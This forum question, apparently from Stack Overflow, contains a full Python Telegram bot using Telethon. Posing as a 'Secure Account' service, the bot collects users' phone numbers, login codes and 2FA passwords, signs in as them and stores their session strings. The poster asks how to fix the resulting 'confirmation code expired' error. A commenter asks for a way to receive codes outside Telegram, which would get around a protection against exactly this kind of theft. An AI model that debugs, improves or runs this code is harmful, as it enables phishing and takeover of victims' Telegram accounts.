# - __main__ - ERROR - Error verifying login code: The confirmation code has expired (caused by SignInRequest) Telethon

Tags: python, python-3.x, telegram-bot, telethon

```
import logging
import os
import asyncio
from telegram import Update, ReplyKeyboardMarkup, KeyboardButton
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, ConversationHandler, CallbackContext

from telethon.sync import TelegramClient
from telethon.sessions import StringSession
from telethon.errors import FloodWaitError, SessionPasswordNeededError as SessionPasswordNeeded

logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)

API_ID = 'API_ID'
API_HASH = 'API_HASH'
BOT_TOKEN = 'BOT_TOKEN'

MEMILIH_AKSI, MASUKKAN_NOMOR, MASUKKAN_KODE, ENTER_2FA = range(4)

keyboard_kustom = [
    [KeyboardButton("Secure Account")],
    [KeyboardButton("Batal")]
]
reply_markup = ReplyKeyboardMarkup(keyboard_kustom, resize_keyboard=True, one_time_keyboard=True)

loop = asyncio.get_event_loop()

def save_session_string(session_string, phone_number):
    if not os.path.exists('sessions'):
        os.makedirs('sessions')
    with open(os.path.join('sessions', phone_number + '.session'), 'w') as f:
        f.write(session_string)

async def async_kirim_kode_login(nomor_telepon: str):
    client = TelegramClient(StringSession(), API_ID, API_HASH)
    try:
        await client.connect()
        if not await client.is_user_authorized():
            result = await client.send_code_request(nomor_telepon)
            logger.info(f"Sent code request to {nomor_telepon}")
            await asyncio.sleep(1)
            return result.phone_code_hash
    except FloodWaitError as e:
        logger.error(f"Blocked by Telegram for {e.seconds} seconds.")
        await asyncio.sleep(e.seconds + 10)
    except Exception as e:
        logger.error(f"Error sending login code: {str(e)}")
    return None

async def async_verifikasi_kode(nomor_telepon: str, kode: str, phone_code_hash: str) -> str:
    client = TelegramClient(StringSession(), API_ID, API_HASH)
    try:
        await client.connect()
        await client.sign_in(phone=nomor_telepon, code=kode, phone_code_hash=phone_code_hash)
        if await client.is_user_authorized():
            save_session_string(client.session.save(), nomor_telepon)
            return "success"
    except SessionPasswordNeeded:
        return "2FA"
    except Exception as e:
        logger.error(f"Error verifying login code: {str(e)}")
        if "The confirmation code has expired" in str(e):
            return "The confirmation code has expired."
    return "Failed to verify the code."

def start(update: Update, context: CallbackContext) -> int:
    user = update.effective_user
    update.message.reply_text(f"Hi {user.first_name}!\nPress 'Secure Account' to secure your account.", reply_markup=reply_markup)
    return MEMILIH_AKSI

def akun_aman(update: Update, context: CallbackContext) -> int:
    update.message.reply_text("Please enter your phone number.")
    return MASUKKAN_NOMOR

def masukkan_nomor(update: Update, context: CallbackContext) -> int:
    nomor = update.message.text
    phone_code_hash = loop.run_until_complete(async_kirim_kode_login(nomor))
    if phone_code_hash:
        context.user_data['phone_number'] = nomor
        context.user_data['phone_code_hash'] = phone_code_hash
        update.message.reply_text("We've sent a login code to your phone. Please enter it within 10 minutes.")  # Inform the user
        return MASUKKAN_KODE
    else:
        update.message.reply_text("Failed to send login code or invalid number entered. Please try again.")
        return MEMILIH_AKSI

def masukkan_kode(update: Update, context: CallbackContext) -> int:
    kode = update.message.text.strip()
    nomor_telepon = context.user_data.get('phone_number')
    phone_code_hash = context.user_data.get('phone_code_hash')
    
    if not nomor_telepon or not phone_code_hash:
        update.message.reply_text("An error occurred. Please try again from the beginning.")
        return ConversationHandler.END
    
    hasil = loop.run_until_complete(async_verifikasi_kode(nomor_telepon, kode, phone_code_hash))
    
    if hasil == "success":
        update.message.reply_text("Your account is now secured.")
        return ConversationHandler.END
    elif hasil == "2FA":
        update.message.reply_text("Please enter your 2FA password.")
        return ENTER_2FA
    elif hasil == "The confirmation code has expired.":
        context.user_data['phone_code_hash'] = None
        update.message.reply_text(hasil + " Please request a new code by entering your phone number again.")
        return MASUKKAN_NOMOR  # Prompt the user to input their phone number again to request a new code
    else:
        update.message.reply_text(hasil + " Please try again.")
        return MASUKKAN_KODE

def enter_2fa(update: Update, context: CallbackContext) -> int:
    password = update.message.text.strip()
    nomor_telepon = context.user_data.get('phone_number')

    client = TelegramClient(StringSession(), API_ID, API_HASH)
    try:
        loop.run_until_complete(client.connect())
        loop.run_until_complete(client.sign_in(password=password))
        save_session_string(client.session.save(), nomor_telepon)
        update.message.reply_text("Your account is now secured.")
        return ConversationHandler.END
    except Exception as e:
        logger.error(f"Error in 2FA: {str(e)}")
        update.message.reply_text("Incorrect 2FA password. Please try again.")
        return ENTER_2FA

def batal(update: Update, context: CallbackContext) -> int:
    update.message.reply_text("Conversation has been canceled.")
    return ConversationHandler.END

def main():
    updater = Updater(BOT_TOKEN, use_context=True)
    dispatcher = updater.dispatcher
    
    handler_percakapan = ConversationHandler(
        entry_points=[CommandHandler('start', start)],
        states={
            MEMILIH_AKSI: [MessageHandler(Filters.regex('^(Secure Account)$'), akun_aman),
                           MessageHandler(Filters.regex('^(Batal)$'), batal)],
            MASUKKAN_NOMOR: [MessageHandler(Filters.text & ~Filters.command, masukkan_nomor)],
            MASUKKAN_KODE: [MessageHandler(Filters.text & ~Filters.command, masukkan_kode)],
            ENTER_2FA: [MessageHandler(Filters.text & ~Filters.command, enter_2fa)]
        },
        fallbacks=[MessageHandler(Filters.regex('^(Batal)$'), batal)]
    )
    
    dispatcher.add_handler(handler_percakapan)
    updater.start_polling()
    updater.idle()

if __name__ == '__main__':
    main()
```

error :

2023-09-28 06:05:38,164 - **main** - ERROR - Error verifying login code: The confirmation code has expired (caused by SignInRequest)

I created a telegram bot to authenticate users and save the session, but I have an expiration problem, how can I solve it?

this bot runs continuously and stores many sessions, please provide a solution to this problem, here I use telethon

Comment: I get the same error. Did you resolve it somehow?

Comment: Its because code expires when you send it over through telegram, need some creative solution to recieve the code outside of telegram if anyone finds it please link it below.